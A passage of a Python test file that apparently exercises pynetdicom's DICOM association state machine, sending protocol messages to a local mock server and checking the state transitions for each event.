("Evt11", [6]), # A-RELEASE (rq) p
("Evt12", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-RELEASE-RQ PDU recv
("Evt13", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-RELEASE-RP PDU recv
("Evt14", [8, 9, 12]), # A-RELEASE (rsp) primitive
("Evt15", [3, 4, 5, 6, 7, 8, 9, 10, 11, 12]), # A-ABORT (rq) primitive
("Evt16", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ABORT PDU recv
("Evt17", [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # Connection closed
("Evt18", [2, 13]), # ARTIM expired
("Evt19", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # Unrecognised PDU rev
]
class BadDUL(object):
"""A DUL that always raises an exception during actions."""
def __init__(self):
self.is_killed = False
def kill_dul(self):
"""Hook for testing whether DUL got killed."""
self.is_killed = True
@property
def primitive(self):
"""Prevent StateMachine from setting primitive."""
return None
class TestStateMachine(object):
"""Non-functional unit tests for fsm.StateMachine."""
def test_init(self):
"""Test creation of new StateMachine."""
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
fsm = assoc.dul.state_machine
assert fsm.current_state == 'Sta1'
assert fsm.dul == assoc.dul
def test_invalid_transition_raises(self):
"""Test StateMachine.transition using invalid states raises."""
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
fsm = assoc.dul.state_machine
msg = r"Invalid state 'Sta0' for State Machine"
with pytest.raises(ValueError, match=msg):
fsm.transition('Sta0')
def test_valid_transition(self):
"""Test StateMachine.transition using valid states."""
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
fsm = assoc.dul.state_machine
for ii in range(1, 14):
assert 1 <= ii <= 13
fsm.transition("Sta{}".format(ii))
assert fsm.current_state == "Sta{}".format(ii)
@pytest.mark.parametrize("event, states", REFERENCE_BAD_EVENTS)
def test_invalid_action_raises(self, event, states):
"""Test StateMachine.do_action raises exception if action invalid."""
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
fsm = assoc.dul.state_machine
for state in states:
state = "Sta{}".format(state)
fsm.current_state = state
msg = msg = (
r"Invalid event '{}' for the current state '{}'"
.format(event, state)
)
with pytest.raises(InvalidEventError, match=msg):
fsm.do_action(event)
@pytest.mark.parametrize("event, states", REFERENCE_GOOD_EVENTS)
def test_exception_during_action(self, event, states):
"""Test an exception raised during an action kill the DUL."""
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
fsm = assoc.dul.state_machine
fsm.dul = BadDUL()
for state in states:
fsm.dul.is_killed = False
state = "Sta{}".format(state)
fsm.current_state = state
with pytest.raises(AttributeError):
fsm.do_action(event)
assert fsm.dul.is_killed is True
assert fsm.current_state == state
class TestStateBase(object):
"""Base class for State tests."""
def setup(self):
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
assoc.set_socket(AssociationSocket(assoc))
# Association Acceptor object -> remote AE
assoc.acceptor.ae_title = validate_ae_title(b'ANY_SCU')
assoc.acceptor.address = 'localhost'
assoc.acceptor.port = 11112
# Association Requestor object -> local AE
assoc.requestor.address = ''
assoc.requestor.port = 11113
assoc.requestor.ae_title = ae.ae_title
assoc.requestor.maximum_length = 16382
assoc.requestor.implementation_class_uid = (
ae.implementation_class_uid
)
assoc.requestor.implementation_version_name = (
ae.implementation_version_name
)
cx = build_context(VerificationSOPClass)
cx.context_id = 1
assoc.requestor.requested_contexts = [cx]
self.assoc = assoc
self.fsm = self.monkey_patch(assoc.dul.state_machine)
def teardown(self):
for thread in threading.enumerate():
if isinstance(thread, ThreadedParrot):
thread.shutdown()
def get_associate(self, assoc_type):
primitive = A_ASSOCIATE()
if assoc_type == 'request':
primitive.application_context_name = '1.2.3.4.5.6'
# Calling AE Title is the source DICOM AE title
primitive.calling_ae_title = b'LOCAL_AE_TITLE '
# Called AE Title is the destination DICOM AE title
primitive.called_ae_title = b'REMOTE_AE_TITLE '
# The TCP/IP address of the source, pynetdicom includes port too
primitive.calling_presentation_address = ('', 0)
# The TCP/IP address of the destination, pynetdicom includes port too
primitive.called_presentation_address = ('localhost', 11112)
# Proposed presentation contexts
cx = build_context(VerificationSOPClass)
cx.context_id = 1
primitive.presentation_context_definition_list = [cx]
user_info = []
item = MaximumLengthNotification()
item.maximum_length_received = 16382
user_info.append(item)
item = ImplementationClassUIDNotification()
item.implementation_class_uid = '1.2.3.4'
user_info.append(item)
primitive.user_information = user_info
elif assoc_type == 'accept':
primitive.application_context_name = '1.2.3.4.5.6'
# Calling AE Title is the source DICOM AE title
primitive.calling_ae_title = b'LOCAL_AE_TITLE '
# Called AE Title is the destination DICOM AE title
primitive.called_ae_title = b'REMOTE_AE_TITLE '
# The TCP/IP address of the source, pynetdicom includes port too
primitive.result = 0x00
primitive.result_source = 0x01
# Proposed presentation contexts
cx = build_context(VerificationSOPClass)
cx.context_id = 1
primitive.presentation_context_definition_results_list = [cx]
user_info = []
item = MaximumLengthNotification()
item.maximum_length_received = 16383
user_info.append(item)
item = ImplementationClassUIDNotification()
item.implementation_class_uid = '1.2.3.4.5'
user_info.append(item)
primitive.user_information = user_info
elif assoc_type == 'reject':
primitive.result = 0x01
primitive.result_source = 0x01
primitive.diagnostic = 0x01
return primitive
def get_release(self, is_response=False):
primitive = A_RELEASE()
if is_response:
primitive.result = 'affirmative'
return primitive
def get_abort(self, is_ap=False):
if is_ap:
primitive = A_P_ABORT()
primitive.provider_reason = 0x00
else:
primitive = A_ABORT()
primitive.abort_source = 0x00
return primitive
def get_pdata(self):
item = [1, p_data_tf[10:]]
primitive = P_DATA()
primitive.presentation_data_value_list.append(item)
return primitive
def monkey_patch(self, fsm):
"""Monkey patch the StateMachine to add testing hooks."""
# Record all state transitions
fsm._transitions = []
fsm.original_transition = fsm.transition
def transition(state):
fsm._transitions.append(state)
fsm.original_transition(state)
fsm.transition = transition
# Record all event/state/actions
fsm._changes = []
fsm._events = []
fsm.original_action = fsm.do_action
def do_action(event):
fsm._events.append(event)
if (event, fsm.current_state) in TRANSITION_TABLE:
action_name = TRANSITION_TABLE[(event, fsm.current_state)]
fsm._changes.append((fsm.current_state, event, action_name))
fsm.original_action(event)
fsm.do_action = do_action
return fsm
def start_server(self, commands):
"""Start the receiving server."""
server = ThreadedParrot(('', 11112), commands)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
return server
def print_fsm_scp(self, fsm, scp=None):
"""Print out some of the quantities we're interested in."""
print('Transitions', fsm._transitions)
print('Changes')
for change in fsm._changes:
print('\t{}'.format(change))
print('Events', fsm._events)
if scp and scp.handlers:
print('Received', scp.handlers[0].received)
print('Sent', scp.handlers[0].sent)
def get_acceptor_assoc(self):
# AF_INET: IPv4, SOCK_STREAM: TCP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(
socket.SOL_SOCKET,
socket.SO_RCVTIMEO,
pack('ll', 1, 0)
)
sock.connect(('', 11112))
ae = AE()
ae.add_supported_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='acceptor')
assoc.set_socket(AssociationSocket(assoc, client_socket=sock))
# Association Acceptor object -> remote AE
assoc.acceptor.ae_title = validate_ae_title(b'ANY_SCU')
assoc.acceptor.address = 'localhost'
assoc.acceptor.port = 11112
# Association Requestor object -> local AE
assoc.requestor.address = ''
assoc.requestor.port = 11113
assoc.requestor.ae_title = ae.ae_title
assoc.requestor.maximum_length = 16382
assoc.requestor.implementation_class_uid = (
ae.implementation_class_uid
)
assoc.requestor.implementation_version_name = (
ae.implementation_version_name
)
cx = build_context(VerificationSOPClass)
cx.context_id = 1
assoc.acceptor.supported_contexts = [cx]
fsm = self.monkey_patch(assoc.dul.state_machine)
return assoc, fsm
class TestState01(TestStateBase):
"""Tests for State 01: Idle."""
def test_evt01(self):
"""Test Sta1 + Evt1."""
# Sta1 + Evt1 -> AE-1 -> Sta4
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
# AE-1: Issue TRANSPORT_CONNECT primitive to <transport service>
commands = [
('recv', None),
('send', a_abort)
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:1] == ['Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta1 + Evt2."""
# Sta1 + Evt2 -> <ignore> -> Sta1
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta1 + Evt3."""
# Sta1 + Evt3 -> <ignore> -> Sta1
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
commands = [
('send', a_associate_ac),
]
scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == []
assert self.fsm._changes[:1] == []
assert self.fsm._events[:1] == ['Evt3']
def test_evt04(self):
"""Test Sta1 + Evt4."""
# Sta1 + Evt4 -> <ignore> -> Sta1
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
commands = [
('send', a_associate_rj),
]
scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == []
assert self.fsm._changes[:1] == []
assert self.fsm._events[:1] == ['Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta1 + Evt5."""
# Sta1 + Evt5 -> AE-5 -> Sta2
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
# AE-5: Issue TRANSPORT_RESPONSE to <transport service>
# Start ARTIM timer
pass
def test_evt06(self):
"""Test Sta1 + Evt6."""
# Sta1 + Evt6 -> <ignore> -> Sta1
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
commands = [
('send', a_associate_rq),
]
scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == []
assert self.fsm._changes[:1] == []
assert self.fsm._events[:1] == ['Evt6']
def test_evt07(self):
"""Test Sta1 + Evt7."""
# Sta1 + Evt7 -> <ignore> -> Sta1
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt7'
def test_evt08(self):
"""Test Sta1 + Evt8."""
# Sta1 + Evt8 -> <ignore> -> Sta1
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt8'
assert self.fsm.current_state == 'Sta1'
def test_evt09(self):
"""Test Sta1 + Evt9."""
# Sta1 + Evt9 -> <ignore> -> Sta1
# Evt9: Receive P-DATA primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt9'
assert self.fsm.current_state == 'Sta1'
def test_evt10(self):
"""Test Sta1 + Evt10."""
# Sta1 + Evt10 -> <ignore> -> Sta1
# Evt10: Receive P-DATA-TF PDU from <remote>
commands = [
('send', p_data_tf),
]
scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == []
assert self.fsm._changes[:1] == []
assert self.fsm._events[:1] == ['Evt10']
def test_evt11(self):
"""Test Sta1 + Evt11."""
# Sta1 + Evt11 -> <ignore> -> Sta1
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt11'
assert self.fsm.current_state == 'Sta1'
def test_evt12(self):
"""Test Sta1 + Evt12."""
# Sta1 + Evt12 -> <ignore> -> Sta1
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
commands = [
('send', a_release_rq),
]
scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == []
assert self.fsm._changes[:1] == []
assert self.fsm._events[:1] == ['Evt12']
def test_evt13(self):
"""Test Sta1 + Evt13."""
# Sta1 + Evt13 -> <ignore> -> Sta1
# Evt13: Receive A-RELEASE-RP PDU from <remote>
commands = [
('send', a_release_rp),
]
scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == []
assert self.fsm._changes[:1] == []
assert self.fsm._events[:1] == ['Evt13']
def test_evt14(self):
"""Test Sta1 + Evt14."""
# Sta1 + Evt14 -> <ignore> -> Sta1
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt14'
assert self.fsm.current_state == 'Sta1'
def test_evt15(self):
"""Test Sta1 + Evt15."""
# Sta1 + Evt15 -> <ignore> -> Sta1
# Evt15: Receive A-ABORT (rq) primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_abort(False))
time.sleep(0.1)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt15'
assert self.fsm.current_state == 'Sta1'
def test_evt16(self):
"""Test Sta1 + Evt16."""
# Sta1 + Evt16 -> <ignore> -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
commands = [
('send', a_abort),
]
scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == []
assert self.fsm._changes[:1] == []
assert self.fsm._events[:1] == ['Evt16']
def test_evt17(self):
"""Test Sta1 + Evt17."""
# Sta1 + Evt17 -> <ignore> -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
commands = []
scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == []
assert self.fsm._changes[:1] == []
assert self.fsm._events[:1] == ['Evt17']
def test_evt18(self):
"""Test Sta1 + Evt18."""
# Sta1 + Evt18 -> <ignore> -> Sta1
# Evt18: ARTIM timer expired from <local service>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.1)
self.assoc.kill()
assert self.assoc.dul.artim_timer.expired
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt18'
assert self.fsm.current_state == 'Sta1'
def test_evt19(self):
"""Test Sta1 + Evt19."""
# Sta1 + Evt19 -> <ignore> -> Sta1
# Evt19: Received unrecognised or invalid PDU from <remote>
commands = [
('send', b'\x08\x00\x00\x00\x00\x00\x00'),
]
scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._transitions[:1] == []
assert self.fsm._changes[:1] == []
assert self.fsm._events[:1] == ['Evt19']
class TestState02(TestStateBase):
"""Tests for State 02: Connection open, waiting for A-ASSOCIATE-RQ."""
def test_evt01(self):
"""Test Sta2 + Evt1."""
# Sta2 + Evt1 -> <ignore> -> Sta2
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('wait', 0.3),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta2 + Evt2."""
# Sta2 + Evt2 -> <ignore> -> Sta2
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta2 + Evt3."""
# Sta2 + Evt3 -> AA-1 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', a_associate_ac),
('recv', None),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt3', 'AA-1')
]
assert fsm._events[:2] == ['Evt5', 'Evt3']
def test_evt04(self):
"""Test Sta2 + Evt4."""
# Sta2 + Evt4 -> AA-1 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', a_associate_rj),
('recv', None),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt4', 'AA-1')
]
assert fsm._events[:2] == ['Evt5', 'Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta2 + Evt5."""
# Sta2 + Evt5 -> <ignore> -> Sta2
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06a(self):
"""Test Sta2 + Evt6."""
# Sta2 + Evt6 -> AE-6 -> **Sta3** or Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AE-6: Stop ARTIM, issue A-ASSOCIATE or A-ASSOCIATE-RJ PDU
commands = [
('send', a_associate_rq),
('recv', None),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6')
]
assert fsm._events[:2] == ['Evt5', 'Evt6']
def test_evt06b(self):
"""Test Sta2 + Evt6."""
# Sta2 + Evt6 -> AE-6 -> Sta3 or **Sta13**
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AE-6: Stop ARTIM, issue A-ASSOCIATE or A-ASSOCIATE-RJ PDU
bad_request = a_associate_rq[:6] + b'\x00\x02' + a_associate_rq[8:]
assert len(bad_request) == len(a_associate_rq)
commands = [
('send', bad_request),
('recv', None),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6')
]
assert fsm._events[:2] == ['Evt5', 'Evt6']
def test_evt07(self):
"""Test Sta2 + Evt7."""
# Sta2 + Evt7 -> <ignore> -> Sta2
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('wait', 0.3),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt7']
def test_evt08(self):
"""Test Sta2 + Evt8."""
# Sta2 + Evt8 -> <ignore> -> Sta2
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('wait', 0.3),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt8']
def test_evt09(self):
"""Test Sta2 + Evt9."""
# Sta2 + Evt9 -> <ignore> -> Sta2
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('wait', 0.3),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt9']
def test_evt10(self):
"""Test Sta2 + Evt10."""
# Sta2 + Evt10 -> AA-1 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', p_data_tf),
('recv', None),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt10', 'AA-1')
]
assert fsm._events[:2] == ['Evt5', 'Evt10']
def test_evt11(self):
"""Test Sta2 + Evt11."""
# Sta2 + Evt11 -> <ignore> -> Sta2
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('wait', 0.3),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt11']
def test_evt12(self):
"""Test Sta2 + Evt12."""
# Sta2 + Evt12 -> AA-1 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', a_release_rq),
('recv', None),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt12', 'AA-1')
]
assert fsm._events[:2] == ['Evt5', 'Evt12']
def test_evt13(self):
"""Test Sta2 + Evt13."""
# Sta2 + Evt13 -> AA-1 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', a_release_rp),
('recv', None),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt13', 'AA-1')
]
assert fsm._events[:2] == ['Evt5', 'Evt13']
def test_evt14(self):
"""Test Sta2 + Evt14."""
# Sta2 + Evt14 -> <ignore> -> Sta2
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('wait', 0.3),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt14']
def test_evt15(self):
"""Test Sta2 + Evt15."""
# Sta2 + Evt15 -> <ignore> -> Sta2
# Evt15: Receive A-ABORT (rq) primitive from <local user>
commands = [
('wait', 0.3),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt15']
def test_evt16(self):
"""Test Sta2 + Evt16."""
# Sta2 + Evt16 -> AA-2 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-2: Stop ARTIM, close connection
commands = [
('send', a_abort),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta1']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt16', 'AA-2')
]
assert fsm._events[:2] == ['Evt5', 'Evt16']
def test_evt17(self):
"""Test Sta2 + Evt17."""
# Sta2 + Evt17 -> AA-5 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-5: Stop ARTIM timer
commands = []
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta1']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt17', 'AA-5')
]
assert fsm._events[:2] == ['Evt5', 'Evt17']
def test_evt18(self):
"""Test Sta2 + Evt18."""
# Sta2 + Evt18 -> AA-2 -> Sta1
# Evt18: ARTIM timer expired from <local service>
commands = [
('wait', 0.3),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
assoc.dul.artim_timer.timeout = 0.05
assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt18']
def test_evt19(self):
"""Test Sta2 + Evt19."""
# Sta2 + Evt19 -> AA-1 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', b'\x08\x00\x00\x00\x00\x00\x00\x00'),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt19', 'AA-1')
]
assert fsm._events[:2] == ['Evt5', 'Evt19']
class TestState03(TestStateBase):
